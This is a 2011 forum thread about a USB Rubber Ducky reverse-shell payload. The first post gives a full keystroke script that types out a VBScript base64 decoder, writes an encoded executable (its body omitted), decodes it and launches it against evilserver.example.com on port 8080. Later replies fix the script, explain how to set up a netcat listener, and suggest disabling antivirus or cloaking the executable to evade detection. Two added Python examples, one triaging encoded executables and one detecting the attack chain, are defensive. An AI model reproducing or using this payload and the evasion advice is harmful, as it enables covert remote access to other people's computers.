Jose B Posted October 9, 2011

Anyone else having trouble with the Reverse Shell Payload? When it runs, the 2 copy cons work, but when it gets to the cscript I get the error:

c:\decoder.vbs(2 ,32) Microsoft VBScript compilation error: Expected end of statement

Here's a screenshot of cmd.exe when the error occurs: http://cl.joseb.me/AnTM

Script used in the payload (the only difference from the one in the wiki is the DELAYs I added to take the screenshot):

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
[the STRING/ENTER lines that type the base64-encoded reverse.exe into c:\reverse.txt, one 72-character line at a time, are omitted here]
CTRL z
ENTER
DELAY 1500
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
DELAY 1500
STRING c:\reverse.exe evilserver.example.com 8080
DELAY 2000
ENTER
DELAY 2000
STRING exit
ENTER
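decoder.vbs in the script above does one job: read the typed reverse.txt, let MSXML's bin.base64 decoding turn it back into bytes, and write those bytes out as reverse.exe. The encoded reverse.exe in the thread decodes to an MZ header that overlaps the string kernel32.dll, with the PE header at offset 0x10. The following is an added example, not from the thread or the wiki payload, that redoes that step in Python from the responder's side: given a .txt found next to a script host, decide whether it is base64 and whether the decoded content is an executable image. The sample inputs are constructed; the PE stub is not a runnable program.

```python
import base64
import binascii
import struct

def build_sample_pe() -> bytes:
    """Constructed stand-in for reverse.exe: an MZ header that overlaps the string
    "kernel32.dll", with e_lfanew (offset 0x3C) pointing at "PE\\0\\0" at offset
    0x10, the same layout as the thread's blob. Not a runnable executable."""
    hdr = bytearray(b"MZkernel32.dll\x00\x00PE\x00\x00")
    hdr += b"\x00" * (0x3C - len(hdr))   # pad up to e_lfanew
    hdr += struct.pack("<I", 0x10)       # e_lfanew -> the "PE\0\0" at 0x10
    hdr += b"\x00" * 16                  # a little trailing body
    return bytes(hdr)

def as_copy_con_text(data: bytes, width: int = 72) -> str:
    """Base64 in 72-column lines joined by CRLF, as the typed reverse.txt is stored."""
    b64 = base64.b64encode(data).decode("ascii")
    return "\r\n".join(b64[i:i + width] for i in range(0, len(b64), width)) + "\r\n"

# Constructed samples: one encoded PE stub and one harmless base64 text file.
SAMPLE_PE_TEXT = as_copy_con_text(build_sample_pe())
SAMPLE_PLAIN_TEXT = as_copy_con_text(b"just some notes, not a program")

def decode_text_blob(text: str) -> bytes:
    """What decoder.vbs does via MSXML's bin.base64: ignore line breaks and
    whitespace, then decode. validate=True rejects anything that is not base64."""
    return base64.b64decode("".join(text.split()), validate=True)

def looks_like_pe(data: bytes) -> bool:
    """MZ signature plus an in-bounds e_lfanew that points at "PE\\0\\0"."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def triage_text_file(text: str) -> dict:
    """Classify a .txt found next to a script host: is it base64, and does the
    decoded content carry an executable image?"""
    try:
        data = decode_text_blob(text)
    except (binascii.Error, ValueError):
        return {"base64": False, "pe": False, "size": 0}
    return {"base64": True, "pe": looks_like_pe(data), "size": len(data)}

if __name__ == "__main__":
    for name, text in (("reverse.txt-like", SAMPLE_PE_TEXT), ("notes", SAMPLE_PLAIN_TEXT)):
        print(name, triage_text_file(text))
```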
ascorbic Posted October 9, 2011

Take a look at the screenshot you posted. Right before the first CONTROL Z you can see the VBScript for decoder.vbs did not finish being copied. Here is the last line:

STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub

The output was only:

STRING binaryStr

This could have happened because something took focus away from the command prompt. Or, what I have been seeing in my testing is that sometimes the Ducky pushes strings out too quickly and the machine receiving them can't keep up. I added a STRING_DELAY, which will slow down the output of strings, to iducke.com; give this script a try: http://www.iducke.com/Encoder/IDE/b

Edited October 9, 2011 by ascorbic
Jose B Posted October 10, 2011

Yep, it works great now! Thanks :D
cgsilvers Posted October 18, 2011

McAfee Antivirus picks this up as: Artemis!347446FE82BF (Trojan)

Any way around this? Thanks,
Xcellerator Posted October 18, 2011

Disable your AV? Or maybe implement a cloaked EXE to hide it?
Sl1m Posted October 27, 2011

Hi guys! I'm such a newb :P but can anyone explain to me how to establish a session with the target computer once the payload has been injected? I have no idea how this works! Do you have to specify the IP address of your remote computer (the one you are using to access the target computer), and also what do you have to change in the script before converting it to a bin file? Excuse my newness. Thanks
devenv Posted October 27, 2011

It's stated in the code:

STRING c:\reverse.exe evilserver.example.com 8080

In the wiki you can find how you can set up the receiving end.
Sl1m Posted October 27, 2011

Thanks for the reply! I am very unfamiliar with servers. How do I set one up? Sorry again, thanks
Sleven Posted October 27, 2011

You don't have to set up a server; you could use your personal wifi router with netcat. You would use your public IP address and a port number above 1024. You will need to forward this port in your router and then listen on that port with netcat. I would suggest using this method for legal purposes.
bobbyb1980 Posted October 28, 2011

Anyone get a working Metasploit payload past an AV? I know you can use shellcode to do that, but doesn't the victim need to have software installed to run that shellcode? Has anyone tried implementing a Java clickjacking-style attack to avoid AV detection?
Xcellerator Posted October 28, 2011

Depends on the AV. I use Avast and while in a testing environment, I have to disable it to get any payloads past it. Perhaps that's a good thing? ;)
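The AV hits discussed in the last few posts are tied to the bytes of reverse.exe; the steps this payload cannot skip are less fragile: cmd.exe itself writing a .vbs (that is what "copy con" looks like on the endpoint), cscript writing an .exe, and that freshly written .exe being launched with a host and port. The following is an added example, not from the thread or the wiki, of detection logic over constructed endpoint events. The pipe-separated event layout is an assumption loosely modelled on Sysmon FileCreate and ProcessCreate records; the sample events are constructed to follow the order of the Ducky script in the first post.

```python
from typing import List, NamedTuple, Tuple

class Event(NamedTuple):
    kind: str    # "FileCreate" or "ProcessCreate"
    actor: str   # creating process image (FileCreate) or parent image (ProcessCreate)
    target: str  # file path (FileCreate) or full command line (ProcessCreate)

# Constructed sample, not real telemetry. The layout is an assumption modelled on
# Sysmon FileCreate (ID 11) and ProcessCreate (ID 1). "copy con" is a cmd.exe
# built-in, so it only shows up as cmd.exe creating a file.
SAMPLE_EVENTS = """\
ProcessCreate|explorer.exe|"C:\\Windows\\System32\\cmd.exe"
FileCreate|cmd.exe|c:\\decoder.vbs
FileCreate|cmd.exe|c:\\reverse.txt
ProcessCreate|cmd.exe|cscript c:\\decoder.vbs c:\\reverse.txt c:\\reverse.exe
FileCreate|cscript.exe|c:\\reverse.exe
ProcessCreate|cmd.exe|c:\\reverse.exe evilserver.example.com 8080
ProcessCreate|cmd.exe|cscript c:\\tools\\inventory.vbs
"""

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")
EXEC_EXT = (".exe", ".dll", ".scr")

def parse_events(text: str) -> List[Event]:
    return [Event(*line.split("|", 2)) for line in text.splitlines() if line.strip()]

def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for the three links of the chain."""
    findings = []
    dropped = set()  # executables written by a script host, lower-cased paths
    for ev in events:
        actor, tgt = ev.actor.lower(), ev.target.lower()
        if ev.kind == "FileCreate":
            # A script written by cmd.exe itself ("copy con" or echo redirection).
            if actor == "cmd.exe" and tgt.endswith(SCRIPT_EXT):
                findings.append(("console-typed script", ev.target))
            # cscript/wscript producing an executable: the decoder step.
            if actor in SCRIPT_HOSTS and tgt.endswith(EXEC_EXT):
                dropped.add(tgt)
                findings.append(("script host wrote executable", ev.target))
        elif ev.kind == "ProcessCreate" and tgt:
            # First token of the command line is the image being launched.
            image = tgt.split(None, 1)[0].strip('"')
            if image in dropped:
                findings.append(("dropped executable launched", ev.target))
    return findings
```

Running detect(parse_events(SAMPLE_EVENTS)) yields one finding per link of the chain, while the inventory.vbs event at the end produces none.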